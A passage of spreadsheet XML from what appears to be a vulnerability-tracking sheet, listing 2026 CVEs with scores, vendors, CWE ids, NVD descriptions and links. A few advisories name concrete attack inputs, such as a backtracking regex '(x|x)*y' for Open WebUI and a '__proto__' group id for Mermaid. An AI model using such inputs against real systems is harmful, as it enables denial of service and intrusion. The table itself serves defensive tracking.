          <t>CVE-2026-69642</t>
        </is>
      </c>
      <c r="C3967" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3967" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3967" s="5" t="inlineStr"/>
      <c r="F3967" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3967" s="5" t="inlineStr"/>
      <c r="H3967" s="5" t="inlineStr"/>
      <c r="I3967" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3967" s="5" t="inlineStr"/>
      <c r="K3967" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3967" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') in Skype for Business allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="M3967" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69642</t>
        </is>
      </c>
    </row>
    <row r="3968">
      <c r="A3968" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3968" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69719</t>
        </is>
      </c>
      <c r="C3968" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3968" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3968" s="5" t="inlineStr"/>
      <c r="F3968" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G3968" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H3968" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I3968" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3968" s="5" t="inlineStr"/>
      <c r="K3968" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L3968" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3968" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69719</t>
        </is>
      </c>
    </row>
    <row r="3969">
      <c r="A3969" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3969" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69734</t>
        </is>
      </c>
      <c r="C3969" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3969" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3969" s="5" t="inlineStr"/>
      <c r="F3969" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G3969" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H3969" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I3969" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3969" s="5" t="inlineStr"/>
      <c r="K3969" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-190</t>
        </is>
      </c>
      <c r="L3969" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3969" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69734</t>
        </is>
      </c>
    </row>
    <row r="3970">
      <c r="A3970" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3970" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69781</t>
        </is>
      </c>
      <c r="C3970" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3970" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3970" s="5" t="inlineStr"/>
      <c r="F3970" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3970" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H3970" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I3970" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3970" s="5" t="inlineStr"/>
      <c r="K3970" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="L3970" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime in Windows DHCP Client allows an unauthorized attacker to deny service over an adjacent network.</t>
        </is>
      </c>
      <c r="M3970" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69781</t>
        </is>
      </c>
    </row>
    <row r="3971">
      <c r="A3971" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3971" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69839</t>
        </is>
      </c>
      <c r="C3971" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3971" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3971" s="5" t="inlineStr"/>
      <c r="F3971" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G3971" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3971" s="5" t="inlineStr"/>
      <c r="I3971" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3971" s="5" t="inlineStr"/>
      <c r="K3971" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="L3971" s="5" t="inlineStr">
        <is>
          <t>Uncaught exception in Windows iSCSI Target Service allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M3971" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69839</t>
        </is>
      </c>
    </row>
    <row r="3972">
      <c r="A3972" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3972" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69855</t>
        </is>
      </c>
      <c r="C3972" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3972" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3972" s="5" t="inlineStr"/>
      <c r="F3972" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3972" s="5" t="inlineStr">
        <is>
          <t>microsoft, azure</t>
        </is>
      </c>
      <c r="H3972" s="5" t="inlineStr">
        <is>
          <t>microsoft:azure_copilot</t>
        </is>
      </c>
      <c r="I3972" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J3972" s="5" t="inlineStr"/>
      <c r="K3972" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3972" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Microsoft Copilot in Azure allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3972" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69855</t>
        </is>
      </c>
    </row>
    <row r="3973">
      <c r="A3973" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3973" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70019</t>
        </is>
      </c>
      <c r="C3973" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3973" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3973" s="5" t="inlineStr"/>
      <c r="F3973" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G3973" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3973" s="5" t="inlineStr"/>
      <c r="I3973" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3973" s="5" t="inlineStr"/>
      <c r="K3973" s="5" t="inlineStr">
        <is>
          <t>CWE-65</t>
        </is>
      </c>
      <c r="L3973" s="5" t="inlineStr">
        <is>
          <t>Windows hard link in Windows Compressed Folder allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3973" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70019</t>
        </is>
      </c>
    </row>
    <row r="3974">
      <c r="A3974" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3974" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70429</t>
        </is>
      </c>
      <c r="C3974" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3974" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3974" s="5" t="inlineStr"/>
      <c r="F3974" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3974" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="H3974" s="5" t="inlineStr">
        <is>
          <t>jenkins:jenkins</t>
        </is>
      </c>
      <c r="I3974" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J3974" s="5" t="inlineStr"/>
      <c r="K3974" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="L3974" s="5" t="inlineStr">
        <is>
          <t>Jenkins 2.575 and earlier, LTS 2.568.1 and earlier handles case-insensitivity in user names and group names inconsistently, allowing attackers able to create new users or groups with names that case-insensitively match other characters to impersonate other users or be granted their permissions in some circumstances.</t>
        </is>
      </c>
      <c r="M3974" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70429</t>
        </is>
      </c>
    </row>
    <row r="3975">
      <c r="A3975" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3975" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70489</t>
        </is>
      </c>
      <c r="C3975" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3975" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3975" s="5" t="inlineStr"/>
      <c r="F3975" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3975" s="5" t="inlineStr"/>
      <c r="H3975" s="5" t="inlineStr"/>
      <c r="I3975" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J3975" s="5" t="inlineStr"/>
      <c r="K3975" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-400</t>
        </is>
      </c>
      <c r="L3975" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.9.0 until 0.11.0, automation recurrence parsing in backend/open_webui/utils/automations.py anchored minutely and hourly rules at a fixed date of 2000-01-01 and then walked forward one interval at a time to find the next run. A single FREQ=MINUTELY rule enumerates roughly a quarter-century of occurrences synchronously on the event loop that also serves scheduler, HTTP, and WebSocket traffic, and the scheduler recomputes the next run for every claimed row on each poll. This causes availability impact for every other user of the instance. This issue is fixed in 0.11.0.</t>
        </is>
      </c>
      <c r="M3975" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70489</t>
        </is>
      </c>
    </row>
    <row r="3976">
      <c r="A3976" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3976" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70491</t>
        </is>
      </c>
      <c r="C3976" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3976" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3976" s="5" t="inlineStr"/>
      <c r="F3976" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3976" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H3976" s="5" t="inlineStr"/>
      <c r="I3976" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J3976" s="5" t="inlineStr"/>
      <c r="K3976" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L3976" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. In 0.10.2 and earlier, the GET /api/v1/tools/, GET /api/v1/tools/list, and GET /api/v1/tools/id/{id} endpoints in backend/open_webui/routers/tools.py returned full Python tool source to authenticated non-admin read-only users. ToolResponse deliberately omitted source and specs, but ToolUserResponse permitted extra fields and handlers spread a full tool model dump into the response, re-admitting omitted fields. A non-admin with a read grant can obtain another user's server-side tool source, which commonly embeds hard-coded API keys, credentials, and internal service URLs. This issue is fixed in 0.11.0.</t>
        </is>
      </c>
      <c r="M3976" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70491</t>
        </is>
      </c>
    </row>
    <row r="3977">
      <c r="A3977" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3977" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70493</t>
        </is>
      </c>
      <c r="C3977" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3977" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3977" s="5" t="inlineStr"/>
      <c r="F3977" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3977" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H3977" s="5" t="inlineStr"/>
      <c r="I3977" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J3977" s="5" t="inlineStr"/>
      <c r="K3977" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="L3977" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.9.6 until 0.11.0, the built-in knowledge search path in backend/open_webui/tools/knowledge_fs.py and backend/open_webui/tools/builtin.py let a chat participant choose a pattern used to grep knowledge files. Patterns containing regex metacharacters were compiled with Python's backtracking re engine and run against every line of every reachable file with no time limit, so a crafted pattern such as (x|x)*y and one matching uploaded file line can pin one CPU core and block the event loop. This causes availability impact for every other user of the affected worker. This issue is fixed in 0.11.0.</t>
        </is>
      </c>
      <c r="M3977" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70493</t>
        </is>
      </c>
    </row>
    <row r="3978">
      <c r="A3978" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3978" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71317</t>
        </is>
      </c>
      <c r="C3978" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3978" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3978" s="5" t="inlineStr"/>
      <c r="F3978" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3978" s="5" t="inlineStr"/>
      <c r="H3978" s="5" t="inlineStr"/>
      <c r="I3978" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J3978" s="5" t="inlineStr"/>
      <c r="K3978" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3978" s="5" t="inlineStr">
        <is>
          <t>Lemur manages TLS certificate creation. Prior to 1.9.3, POST /api/1/authorities with type=subca did not require AuthorityPermission on the parent authority when ADMIN_ONLY_AUTHORITY_CREATION was false. AssociatedAuthoritySchema resolved the caller-supplied parent and passed it through authority creation to cryptography-issuer, which used the parent authority_certificate.private_key to sign a new intermediate. Any authenticated non-read-only user in that supported configuration could chain a sub-CA to an internal root for which the user held no role. The resulting intermediate could issue trusted certificates and its private key could be used outside Lemur, bypassing normal issuance controls. The fix checks AuthorityPermission on every supplied parent before invoking the issuer. This issue is fixed in version 1.9.3.</t>
        </is>
      </c>
      <c r="M3978" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71317</t>
        </is>
      </c>
    </row>
    <row r="3979">
      <c r="A3979" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3979" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71437</t>
        </is>
      </c>
      <c r="C3979" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3979" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3979" s="5" t="inlineStr"/>
      <c r="F3979" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3979" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H3979" s="5" t="inlineStr"/>
      <c r="I3979" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J3979" s="5" t="inlineStr"/>
      <c r="K3979" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="L3979" s="5" t="inlineStr">
        <is>
          <t>Mermaid is a JavaScript tool that uses Markdown-inspired text to create and modify diagrams and charts. From version 11.5.0 until 11.16.1, Mermaid Architecture Diagrams are vulnerable to prototype pollution when a diagram defines a group with an id of __proto__. Because the group id is used directly as an object property key without validation, an attacker who can supply diagram text can pollute Object.prototype, potentially affecting the behavior of the embedding application. This issue is fixed in version 11.16.1.</t>
        </is>
      </c>
      <c r="M3979" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71437</t>
        </is>
      </c>
    </row>
    <row r="3980">
      <c r="A3980" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3980" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72726</t>
        </is>
      </c>
      <c r="C3980" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3980" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3980" s="5" t="inlineStr"/>
      <c r="F3980" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3980" s="5" t="inlineStr"/>
      <c r="H3980" s="5" t="inlineStr"/>
      <c r="I3980" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J3980" s="5" t="inlineStr"/>
      <c r="K3980" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L3980" s="5" t="inlineStr">
        <is>
          <t>Discourse is an open-source discussion platform. Prior to 2026.1.6, 2026.5.2, 2026.6.1, and 2026.7.0, an authenticated user could eavesdrop on private AI bot conversations through the AI bot reply stream. The issue is fixed in 2026.1.6, 2026.5.2, 2026.6.1, and 2026.7.0.</t>
        </is>
      </c>
      <c r="M3980" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72726</t>
        </is>
      </c>
    </row>
    <row r="3981">
      <c r="A3981" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3981" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72739</t>
        </is>
      </c>
      <c r="C3981" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3981" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3981" s="5" t="inlineStr"/>
      <c r="F3981" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3981" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H3981" s="5" t="inlineStr"/>
      <c r="I3981" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J3981" s="5" t="inlineStr"/>
      <c r="K3981" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L3981" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, the createCommand() function constructs shell commands by interpolating compose service names and configuration into bash command strings. When a compose with a maliciously crafted name or service definition is deployed, the shell metacharacters are interpreted as command separators, allowing arbitrary command execution on the Docker host. This vulnerability is fixed in 0.29.13.</t>
        </is>
      </c>
      <c r="M3981" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72739</t>
        </is>
      </c>
    </row>
    <row r="3982">
      <c r="A3982" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3982" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72873</t>
        </is>
      </c>
      <c r="C3982" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3982" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3982" s="5" t="inlineStr"/>
      <c r="F3982" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3982" s="5" t="inlineStr"/>
      <c r="H3982" s="5" t="inlineStr"/>
      <c r="I3982" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J3982" s="5" t="inlineStr"/>
      <c r="K3982" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L3982" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, application.one in apps/dokploy/server/api/routers/application.ts returns provider relations loaded by findApplicationById in packages/server/src/services/application.ts without redacting githubClientSecret, githubPrivateKey, or githubWebhookSecret, allowing a user with only service:read permission to retrieve another user’s Git provider secrets even when hasGitProviderAccess is false and unauthorizedProvider is set. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M3982" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72873</t>
        </is>
      </c>
    </row>
    <row r="3983">
      <c r="A3983" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3983" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72907</t>
        </is>
      </c>
      <c r="C3983" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3983" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3983" s="5" t="inlineStr"/>
      <c r="F3983" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3983" s="5" t="inlineStr"/>
      <c r="H3983" s="5" t="inlineStr"/>
      <c r="I3983" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J3983" s="5" t="inlineStr"/>
      <c r="K3983" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="L3983" s="5" t="inlineStr">
        <is>
          <t>ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 15.111.0 and 16.22.0, the add_ac function in erpnext/accounts/utils.py accepts the ignore_permissions argument without enforcing Account create permission, allowing an authenticated limited user to create unauthorized accounting master records and affect financial data integrity and audit trails. This issue is fixed in versions 15.111.0 and 16.22.0.</t>
        </is>
      </c>
      <c r="M3983" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72907</t>
        </is>
      </c>
    </row>
    <row r="3984">
      <c r="A3984" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3984" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72908</t>
        </is>
      </c>
      <c r="C3984" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3984" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3984" s="5" t="inlineStr"/>
      <c r="F3984" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3984" s="5" t="inlineStr"/>
      <c r="H3984" s="5" t="inlineStr"/>
      <c r="I3984" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J3984" s="5" t="inlineStr"/>
      <c r="K3984" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L3984" s="5" t="inlineStr">
        <is>
          <t>ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 15.109.0 and 16.20.0, the get_tax_template function in erpnext/accounts/doctype/tax_rule/tax_rule.py constructs an SQL WHERE clause from request-influenced posting_date and args values, allowing an authenticated low-privilege user to inject SQL and extract sensitive information. This issue is fixed in versions 15.109.0 and 16.20.0.</t>
        </is>
      </c>
      <c r="M3984" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72908</t>
        </is>
      </c>
    </row>
    <row r="3985">
      <c r="A3985" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3985" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72938</t>
        </is>
      </c>
      <c r="C3985" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3985" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3985" s="5" t="inlineStr"/>
      <c r="F3985" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G3985" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H3985" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I3985" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3985" s="5" t="inlineStr"/>
      <c r="K3985" s="5" t="inlineStr">
        <is>
          <t>CWE-822, CWE-843</t>
        </is>
      </c>
      <c r="L3985" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3985" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72938</t>
        </is>
      </c>
    </row>
    <row r="3986">
      <c r="A3986" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3986" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72939</t>
        </is>
      </c>
      <c r="C3986" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3986" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3986" s="5" t="inlineStr"/>
      <c r="F3986" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G3986" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3986" s="5" t="inlineStr"/>
      <c r="I3986" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3986" s="5" t="inlineStr"/>
      <c r="K3986" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L3986" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M3986" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72939</t>
        </is>
      </c>
    </row>
    <row r="3987">
      <c r="A3987" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3987" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72942</t>
        </is>
      </c>
      <c r="C3987" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3987" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3987" s="5" t="inlineStr"/>
      <c r="F3987" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G3987" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3987" s="5" t="inlineStr"/>
      <c r="I3987" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3987" s="5" t="inlineStr"/>
      <c r="K3987" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3987" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M3987" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72942</t>
        </is>
      </c>
    </row>
    <row r="3988">
      <c r="A3988" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3988" s="5" t="inlineStr">
        <is>
